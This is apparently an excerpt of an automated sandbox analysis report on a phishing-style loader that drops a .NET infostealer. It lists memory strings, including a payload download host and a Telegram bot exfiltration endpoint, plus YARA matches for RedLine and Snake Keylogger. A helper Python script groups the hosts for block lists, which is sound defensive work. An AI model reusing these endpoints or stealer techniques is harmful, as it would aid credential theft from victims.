http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                           Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                           Source: PO_B2W984.com, 00000000.00000003.22961850687.0000000022891000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962642028.000000007E75A000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000002.23155674229.0000000020D19000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0$
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
                           Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
                           Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                           Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png4
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
                           Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.orgd
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23006549497.00000000048E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
                          Source: powershell.exe, 00000007.00000002.23005690561.0000000003119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                          Source: PO_B2W984.com, 00000000.00000003.22961850687.0000000022891000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22981256081.000000002293B000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962642028.000000007E75A000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000002.23155674229.0000000020D19000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com0
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                          Source: powershell.exe, 00000007.00000002.23006549497.00000000048E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24191123588.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24191123588.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/
                          Source: PO_B2W984.com, 00000000.00000002.22975988044.0000000020D1D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22965692413.0000000000999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_OupzhkprnvwE
                          Source: powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drString found in binary or memory: https://reallyfreegeoip.org/xml/
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.153.238d
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.153.238l
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                          Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: rpkhzpuO.pif, 00000013.00000003.23143070311.000000002E8BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wdcp.mit
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.11.20:49747 version: TLS 1.2
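The string hits above mix three kinds of hosts: the loader's download location (lwaziacademy.com, referenced only by PO_B2W984.com), the stealer's exfiltration and geolocation endpoints (api.telegram.org and reallyfreegeoip.org, referenced by Microsofts.exe), and strings that signed binaries and PowerShell carry regardless of the sample (OCSP responders, Pester, contoso.com, nuget.org). The trailing characters on several entries (com0X, orgd, png4) are bytes that happened to follow the string in memory, not part of the URL. The script below is an added example, not part of the Joe Sandbox report: it parses report lines of this shape, trims that residue using a small constructed suffix list (an assumption made for this example; a real tool would consult the Public Suffix List), and groups hosts by the processes that referenced them so the loader/payload split is visible at a glance. The sample lines are transcribed from this report.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: six "String found in binary or memory" entries transcribed
# from this report exactly as extracted (the "sdmpString" fusion is part of the
# report text, so the parser has to tolerate it).
REPORT_LINES = [
    "Source: powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4",
    "Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd",
    "Source: Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.153.238l",
    "Source: Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=",
    "Source: PO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw",
    "Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X",
]

# "Source: <name, dump-id, name, dump-id ...>String found in binary or memory: <url>"
LINE_RE = re.compile(
    r"^Source:\s*(?P<sources>.*?)\s*String found in binary or memory:\s*(?P<url>\S+)\s*$"
)

# Assumption for this example: a hand-picked suffix list is enough to tell where a
# host name ends and the memory residue begins. Replace with the Public Suffix List
# for real use.
KNOWN_TLDS = ("com", "org", "net", "ms", "bm")
HOST_RE = re.compile(
    r"^(?P<host>[a-z0-9-]+(?:\.[a-z0-9-]+)*?\.(?:%s))(?P<tail>[a-z0-9]*)$" % "|".join(KNOWN_TLDS)
)


def source_processes(sources):
    """Keep process and dropped-file names from a Source field; drop the memory-dump ids."""
    return {tok for tok in (t.strip() for t in sources.split(",")) if tok and not tok.endswith(".sdmp")}


def normalise_host(url):
    """Return (host, tail): host with trailing memory residue removed, and the residue."""
    raw = urlsplit(url).hostname or ""
    m = HOST_RE.match(raw)
    if not m:
        # Unknown suffix or truncated string (e.g. "www.microsoft.co"): keep as seen.
        return raw, ""
    return m.group("host"), m.group("tail")


def summarise(lines):
    """Map each normalised host to the processes that referenced it and the raw strings seen."""
    out = defaultdict(lambda: {"processes": set(), "raw": set(), "residue": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        host, tail = normalise_host(m.group("url"))
        entry = out[host]
        entry["processes"] |= source_processes(m.group("sources"))
        entry["raw"].add(m.group("url"))
        if tail:
            entry["residue"].add(tail)
    return dict(out)


if __name__ == "__main__":
    for host, e in sorted(summarise(REPORT_LINES).items()):
        print(f"{host:24} procs={sorted(e['processes'])} residue={sorted(e['residue'])}")
```

Grouping by host rather than by raw string collapses the variants of reallyfreegeoip.org into one line and shows that api.telegram.org is referenced both by the running Microsofts.exe and by the dropped copy on disk, which is what you want when turning a report like this into block-list entries.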

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Microsofts.exe.4.dr, UltraSpeed.cs | .Net Code: TakeScreenshot
Source: Microsofts.exe.4.dr, UltraSpeed.cs | .Net Code: VKCodeToUnicode

                          System Summary

Source: 4.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 19.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
